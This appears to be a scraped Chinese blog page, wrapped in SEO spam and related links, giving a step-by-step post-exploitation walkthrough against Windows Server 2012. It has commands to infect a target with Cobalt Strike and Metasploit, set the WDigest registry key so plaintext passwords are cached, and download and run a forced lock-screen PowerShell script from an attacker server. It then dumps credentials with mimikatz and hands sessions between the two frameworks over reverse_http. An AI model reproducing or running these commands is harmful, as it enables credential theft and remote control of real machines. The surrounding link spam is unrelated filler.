当前位置: 首页 > news >正文

网站建设是前端的吗建行手机银行app

网站建设是前端的吗,建行手机银行app,合肥网站推广优化,海外网站推广cs与msf权限传递以及mimikatz抓取win2012明文密码 使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上 1.cs生成木马并使目标服务器中马 建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令 shell …

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.yayakq.cn/news/182173/

相关文章:

  • 可以上传高清图片的网站并做外链营销型网站建设套餐
  • 网站客户运营搜索引擎推广的效果
  • 佛山网络营销网站兰州网络推广制度
  • 陕西交通建设有限公司网站宁波网站推广方式怎么样
  • 传世网站建设大连seo顾问
  • 企业网站备案拍照免费行情网站软件
  • html做的网站怎么发布短视频制作培训班
  • 公司网站建设北京网站建设 都选万维科技
  • 自己怎么搭建个人博客网站新遵义吧
  • php网站建设题目网页设计个人主页图片
  • amp 网站开发描述网站建设的基本流程图
  • 装修公司营销型网站建设旅游网站网页设计模板代码
  • wordpress文章版权主题插件镇江关键词优化
  • 网页设计 参考网站如何让产品吸引顾客
  • 专业的网站建设哪家好长春
  • 电子商务怎么做网站百度制作网站推广
  • 济源市工程建设监理所网站江苏省备案网站
  • 响应式网站文章WordPress用户管理系统
  • 电商建站网页加速器浏览器
  • 个人做网站要买什么域名做网站用什么浏览器
  • 网站什么认证对做电商好开发手机端网站
  • 虚拟网站规划与设计网站内的搜索怎么做的
  • 做销售用的免费发布信息网站中小学网站建设
  • 阿里云可以做网站么网站权重7怎么做
  • 运营型网站wordpress个人展示网站
  • 网站怎么发布河南建设厅网站地址
  • 企业营销网站建设公司做网站多钱
  • 注册网站乱填邮箱住房和城乡建设部政务服务门户网站
  • 网站建设栏目设置表格个人网站设计论文下载
  • 鄞州seo整站优化服务wordpress 汉化软件